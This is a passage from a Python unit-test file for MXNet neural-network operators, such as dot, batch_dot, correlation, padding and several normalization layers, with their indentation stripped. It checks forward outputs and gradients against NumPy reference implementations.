out_grad = mx.nd.ones(out.shape, ctx=dev)
exe.backward([out_grad])
# check backward
assert_almost_equal(out_grad.asnumpy(), grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
def test_stn_valid_sampling():
target_shape = (
28,
28,
)
src_shape = (
42,
42,
)
data = mx.sym.Variable(name="data")
loc = mx.sym.Variable(name="loc")
data_array = np.zeros((
1,
1,
) + src_shape)
# Have an ever so slight rotation.
loc_array = np.array(
[[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
-0.000919065]])
stn = mx.sym.SpatialTransformer(
data=data,
loc=loc,
target_shape=target_shape,
transform_type="affine",
sampler_type="bilinear")
grad_req = {k: 'write' for k in stn.list_arguments()}
grads = {
'data': mx.nd.array(np.zeros_like(data_array)),
'loc': mx.nd.array(np.zeros_like(loc_array))
}
executor = stn.bind(
ctx=default_context(),
args={'data': mx.nd.array(data_array),
'loc': mx.nd.array(loc_array)},
grad_req=grad_req,
args_grad=grads)
executor.forward(is_train=True)
executor.backward(mx.nd.ones((
1,
1,
) + target_shape))
@with_seed()
def test_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
ndims = [2]
if ctx.device_type == 'gpu':
dtypes += ['float16']
ndims += [1]
# Test normal dot.
for ndim in ndims:
for data_type in dtypes:
for m in range(1, 5):
for k in range(1, 5):
if ndim == 1 and k != 1:
pass
for n in range(1, 5):
a_shape = (m, k) if ndim == 2 else (m,)
b_shape = (k, n) if ndim == 2 else (n,)
a_npy = np.random.normal(0, 1, (m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((m, k), dtype=data_type)
bgrad_npy = np.empty((k, n), dtype=data_type)
c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.dot(a, b)
exe = c.simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0].asnumpy(), c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-3)
exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
assert_almost_equal(exe.grad_dict['a'].asnumpy(), agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-3)
assert_almost_equal(exe.grad_dict['b'].asnumpy(), bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-3)
# Test dot with transpose flag using gradient checker.
def dot_sym(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y)
def dot_sym_xT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True)
def dot_sym_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_b=True)
def dot_sym_xT_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
for data_type in dtypes:
for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
m1_npy = np.random.uniform(-1, 1, ashape)
m1_npy = m1_npy.astype(data_type)
m2_npy = np.random.uniform(-1, 1, bshape)
m2_npy = m2_npy.astype(data_type)
check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
@with_seed()
def test_batch_dot():
dtypes = ['float32', 'float64']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for data_type in dtypes:
for batch_size in range(1, 5):
for m in range(1, 5):
for k in range(1, 5):
for n in range(1, 5):
transpose_a = (np.random.rand() > 0.5)
transpose_b = (np.random.rand() > 0.5)
a_npy = np.random.normal(0, 1, (batch_size, m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (batch_size, k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((batch_size, m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
a_init_grad_npy = a_npy.astype(data_type)
b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
b_init_grad_npy = b_npy.astype(data_type)
for i in range(batch_size):
c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
if transpose_a:
a_npy = np.transpose(a_npy, axes=(0, 2, 1))
agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
if transpose_b:
b_npy = np.transpose(b_npy, axes=(0, 2, 1))
bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
exe = c.simple_bind(ctx=default_context(),
a=a_npy.shape, b=b_npy.shape, grad_req='write')
exe_add = c.simple_bind(ctx=default_context(),
a=a_npy.shape, b=b_npy.shape, grad_req='add')
exe_add.grad_dict['a'][:] = a_init_grad_npy
exe_add.grad_dict['b'][:] = b_init_grad_npy
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0].asnumpy(), c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe.grad_dict['a'].asnumpy(), agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe.grad_dict['b'].asnumpy(), bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe_add.forward(is_train=True, a=a_npy, b=b_npy)
exe_add.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe_add.grad_dict['a'].asnumpy(),
agrad_npy + a_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe_add.grad_dict['b'].asnumpy(),
bgrad_npy + b_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
img1 = mx.sym.Variable('img1')
img2 = mx.sym.Variable('img2')
return mx.sym.Correlation(data1=img1,data2=img2,kernel_size =kernel_size,max_displacement = max_displacement,
stride1 = stride1,stride2 = stride2,pad_size= pad_size,is_multiply = is_multiply)
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
else:
out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
out /= float(kernel_size**2*data1.shape[1])
return out,tmp1,tmp2
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1_grad = np.zeros(tmp1.shape)
tmp2_grad = np.zeros(tmp2.shape)
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
else:
sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
img1 = np.random.random(data_shape)
img1 = img1.astype(dtype)
img2 = np.random.random(data_shape)
img2 = img2.astype(dtype)
net1 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply)
net2 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply )
exe1 = net1.simple_bind(default_context(),img1=img1.shape,img2=img1.shape)
exe1.arg_dict['img1'][:] = img1
exe1.arg_dict['img2'][:] = img2
#cpu forward
exe1.forward(is_train=True)
# python forward
forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# forward error
assert_almost_equal(exe1.outputs[0].asnumpy(), forward_result, rtol=1e-4, atol=1e-4)
# out_grad
a = np.ones(forward_result.shape)
out_grad1 = mx.nd.array(a,default_context())
# cpu backward
exe1.backward(out_grads=out_grad1)
# python backward
grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# backward error
assert_almost_equal(exe1.grad_dict['img1'].asnumpy(), grad1, rtol=1e-3, atol=1e-4)
assert_almost_equal(exe1.grad_dict['img2'].asnumpy(), grad2, rtol=1e-3, atol=1e-4)
@with_seed()
def test_correlation():
def test_infer_type(dtype):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
corr = mx.sym.Correlation(data1=a, data2=b)
arg_type1, out_type1, _ = corr.infer_type(a=dtype)
if arg_type1[0] != np.dtype(dtype) and arg_type1[1] != np.dtype(dtype) and out_type1[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from a is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
arg_type2, out_type2, _ = corr.infer_type(b=dtype)
if arg_type2[0] != np.dtype(dtype) and arg_type2[1] != np.dtype(dtype) and out_type2[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from b is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
for dtype in ['float16', 'float32']:
test_infer_type(dtype)
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 1,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 10,stride1 = 1,stride2 = 2,pad_size = 10,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,6,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,11,11), kernel_size = 5,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
@with_seed()
def test_support_vector_machine_l1_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L, use_linear=True)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0].asnumpy())
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-1) * l_mask * np.greater(1 - l_mask * x_np, 0)
assert_almost_equal(grad_np, grad.asnumpy())
@with_seed()
def test_support_vector_machine_l2_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
x_np = x_np.astype(np.float32)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0].asnumpy())
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-2)*l_mask*np.maximum(1-l_mask*x_np,0)
grad_np = grad_np.astype(np.float32)
assert_almost_equal(grad_np, grad.asnumpy())
# Seed set because the test is not robust enough to operate on random data
@with_seed(1234)
def test_roipooling():
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
x1 = np.random.rand(4, 3, 12, 8).astype('float32')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'write', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'add', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1E-4)
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
# bind with label
X = mx.symbol.Variable('X', dtype=dtype)
Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
# numpy result
pad_grouped = list(zip(*[iter(list(pad_width))] * 2))
np_out = np.pad(x.asnumpy(), pad_grouped, mode)
# mxnet result
grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
exec1 = Y.bind(xpu, args = [x], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0].asnumpy()
# compare numpy + mxnet
assert_almost_equal(out, np_out)
# grad check
check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
@with_seed()
def test_pad():
ctx = default_context()
shape1 = (2, 3, 3, 5)
pad1 = (0, 0, 0, 0, 1, 2, 3, 4)
shape2 = (2, 3, 3, 5, 4)
pad2 = (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)
# note: this op doesn't support ints yet. Add tests when supported
dtypes = ["float16", "float32", "float64"]
for dtype in dtypes:
check_pad_with_shape(shape1, ctx, pad1, 'constant', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'edge', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'constant', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'edge', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'reflect', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'reflect', dtype)
def np_instance_norm(data, weight, bias, eps):
spatial_dims = data.shape[2::]
num_spatial_vals = np.prod(np.array(spatial_dims))
scale = 1/float(num_spatial_vals)
sum_axis = tuple(range(2, data.ndim))
mean = scale * np.sum(data, axis = sum_axis)
mean = np.reshape(np.repeat(mean, num_spatial_vals), data.shape)
var = scale * np.sum((data - mean)**2, axis = sum_axis)
var = np.reshape(np.repeat(var, num_spatial_vals), data.shape)
weightBatch = np.tile(weight, (data.shape[0], 1))
weightBatch = np.reshape(np.repeat(weightBatch, num_spatial_vals), data.shape)
biasBatch = np.tile(bias, (data.shape[0], 1))
biasBatch = np.reshape(np.repeat(biasBatch, num_spatial_vals), data.shape)
return weightBatch * (data - mean)/np.sqrt(var + eps) + biasBatch
def check_instance_norm_with_shape(shape, xpu):
# bind with label
eps = 0.001
X = mx.symbol.Variable('X')
G = mx.symbol.Variable('G')
B = mx.symbol.Variable('B')
Y = mx.symbol.InstanceNorm(data=X, beta=B, gamma=G, eps=eps)
x = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
gamma = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
beta = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
np_out = np_instance_norm(x.asnumpy(), gamma.asnumpy(), beta.asnumpy(), eps)
exec1 = Y.bind(xpu, args = {'X':x, 'G':gamma, 'B':beta})
exec1.forward(is_train=False)
out = exec1.outputs[0].asnumpy()
assert_almost_equal(out, np_out, rtol=1e-4, atol=1e-4)
check_numeric_gradient(Y, {'X':x.asnumpy(), 'G':gamma.asnumpy(), 'B':beta.asnumpy()},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
@with_seed()
def test_instance_normalization():
check_instance_norm_with_shape((1, 1, 1), default_context())
check_instance_norm_with_shape((2, 1, 2), default_context())
check_instance_norm_with_shape((2,4,5,6), default_context())
check_instance_norm_with_shape((3,3,2,3,2,1,1), default_context())
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
ctx = default_context()
data = mx.symbol.Variable('data')
out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
# calculate numpy results
if mode == 'channel':
assert in_data.ndim > 2
np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
np_out = np.multiply(in_data, np_norm)
elif mode == 'spatial':
assert in_data.ndim > 2
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0] / s[1], axis=2)
np_out = np.multiply(in_data, np_norm.reshape(s))
elif mode == 'instance':
assert in_data.ndim > 1
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0], axis=1)
np_out = np.multiply(in_data, np_norm.reshape(s))
else:
raise RuntimeError('Unknown l2 normalization mode')
exe = out.simple_bind(ctx=ctx, data=in_data.shape)
output = exe.forward(is_train=True, data=in_data)
# compare numpy + mxnet
assert_almost_equal(exe.outputs[0].asnumpy(), np_out, rtol=1e-2 if dtype is 'float16' else 1e-5, atol=1e-5)
# check gradient
check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
@with_seed()
def test_l2_normalization():
for dtype in ['float16', 'float32', 'float64']:
for mode in ['channel', 'spatial', 'instance']:
nbatch = random.randint(1, 4)
nchannel = random.randint(3, 5)
height = random.randint(4, 6)
check_l2_normalization((nbatch, nchannel, height), mode, dtype)
width = random.randint(5, 7)
check_l2_normalization((nbatch, nchannel, height, width), mode, dtype)
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32,
forward_check_eps=1E-3, backward_check_eps=1E-3,
npy_grad_check=True, finite_grad_check=True):
def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
if axis < 0:
axis += data.ndim
broadcast_shape = [1 for _ in range(data.ndim)]
broadcast_shape[axis] = data.shape[axis]
mean = data.mean(axis=axis, keepdims=True).astype(dtype)
var = data.var(axis=axis, keepdims=True).astype(dtype)
std = np.sqrt(var + dtype(eps)).astype(dtype)
out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
np.reshape(beta, broadcast_shape)
return out
def npy_layer_norm_grad(data, gamma, out_grad, axis, eps):
if axis < 0:
axis += data.ndim
exclude_axis = tuple([ele for ele in range(data.ndim) if ele != axis])
data_mean = data.mean(axis=axis, keepdims=True)
data_var = data.var(axis=axis, keepdims=True)
data_std = np.sqrt(data_var + eps)
centered_data = (data - data_mean) / data_std
gamma_grad = (centered_data * out_grad).sum(axis=exclude_axis, keepdims=True)
beta_grad = out_grad.sum(axis=exclude_axis, keepdims=True)
w = out_grad * gamma.reshape([1 if i != axis else data.shape[axis] for i in range(data.ndim)])\
/ data_std
data_grad = w - w.mean(axis=axis, keepdims=True)\
- centered_data * (w * centered_data).mean(axis=axis, keepdims=True)
gamma_grad = gamma_grad.reshape((-1,))
beta_grad = beta_grad.reshape((-1,))
return data_grad, gamma_grad, beta_grad
ctx = default_context()
data = np.random.normal(0, 1, in_shape).astype(dtype)
gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
data_s = mx.symbol.Variable('data')
gamma_s = mx.symbol.Variable('gamma')
beta_s = mx.symbol.Variable('beta')
out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
exe = out_s.simple_bind(ctx, data=in_shape)
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
out_nd = exe.forward()[0]
out = npy_layer_norm(data, gamma, beta, axis, eps)
assert_almost_equal(out, out_nd.asnumpy(), forward_check_eps, forward_check_eps)
if finite_grad_check:
for req in ['write', 'add']:
check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
grad_nodes={'data': req, 'gamma': req, 'beta': req},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
if npy_grad_check:
# Test for grad_req = write
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='write')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad =\
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(), gt_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(), gt_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(), gt_beta_grad, backward_check_eps, backward_check_eps)
# Test for grad_req = add
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_data_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_gamma_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
init_beta_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='add')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.grad_dict['data'][:] = init_data_grad
exe.grad_dict['gamma'][:] = init_gamma_grad
exe.grad_dict['beta'][:] = init_beta_grad
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad = \
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(),
gt_data_grad + init_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(),
gt_gamma_grad + init_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(),
gt_beta_grad + init_beta_grad, backward_check_eps, backward_check_eps)
@with_seed()
def test_norm():
try:
import scipy
assert LooseVersion(scipy.__version__) >= LooseVersion('0.1')
from scipy.linalg import norm as sp_norm
except (AssertionError, ImportError):
print("Could not import scipy.linalg.norm or scipy is too old. "
"Falling back to numpy.linalg.norm which is not numerically stable.")
from numpy.linalg import norm as sp_norm
def l1norm(input_data, axis=0, keepdims=True):
return np.sum(abs(input_data), axis=axis, keepdims=keepdims)
def l2norm(input_data, axis=0, keepdims=True):
return sp_norm(input_data, axis=axis, keepdims=keepdims)
ctx = default_context()
data = mx.symbol.Variable('data')
in_data_dim = random_sample([2,3,4], 1)[0]
in_shape = rand_shape_nd(in_data_dim, dim=5)
epsilon = 1e-3
acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64,
np.int32: np.int32, np.int64: np.int64}
dtype_to_str = {np.float16: 'float16', np.float32: 'float32', np.float64: 'float64',
np.int32: 'int32', np.int64: 'int64'}
is_windows = sys.platform.startswith('win')
for enforce_safe_acc in ["1", "0"]:
if is_windows:
if enforce_safe_acc == "0":
break
